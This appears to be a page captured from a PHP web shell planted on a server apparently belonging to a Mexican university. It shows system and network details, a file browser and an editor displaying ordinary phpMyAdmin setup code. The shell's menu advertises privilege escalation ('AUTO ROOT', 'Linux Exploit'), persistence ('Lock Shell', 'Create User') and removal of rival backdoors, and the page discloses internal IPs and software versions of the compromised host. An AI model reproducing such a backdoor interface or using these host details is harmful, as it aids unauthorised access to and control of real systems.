Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
setup /
frames /
[ HOME SHELL ]
Name
Size
Permission
Action
config.inc.php
1.12
KB
-rwxrwxr-x
form.inc.php
1.34
KB
-rwxrwxr-x
index.inc.php
7.93
KB
-rwxrwxr-x
menu.inc.php
920
B
-rwxrwxr-x
servers.inc.php
1.33
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : servers.inc.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Server create and edit view * * @package PhpMyAdmin-Setup */ use PMA\libraries\config\ConfigFile; use PMA\libraries\config\FormDisplay; use PMA\libraries\URL; if (!defined('PHPMYADMIN')) { exit; } /** * Core libraries. */ require_once './setup/lib/form_processing.lib.php'; require './libraries/config/setup.forms.php'; $mode = isset($_GET['mode']) ? $_GET['mode'] : null; $id = PMA_isValid($_GET['id'], 'numeric') ? intval($_GET['id']) : null; /** @var ConfigFile $cf */ $cf = $GLOBALS['ConfigFile']; $server_exists = !empty($id) && $cf->get("Servers/$id") !== null; if ($mode == 'edit' && $server_exists) { $page_title = __('Edit server') . ' ' . $id . ' <small>(' . htmlspecialchars($cf->getServerDSN($id)) . ')</small>'; } elseif ($mode == 'remove' && $server_exists) { $cf->removeServer($id); header('Location: index.php' . URL::getCommonRaw()); exit; } elseif ($mode == 'revert' && $server_exists) { // handled by process_formset() } else { $page_title = __('Add a new server'); $id = 0; } if (isset($page_title)) { echo '<h2>' , $page_title . '</h2>'; } $form_display = new FormDisplay($cf); foreach ($forms['Servers'] as $form_name => $form) { $form_display->registerForm($form_name, $form, $id); } PMA_Process_formset($form_display);
Close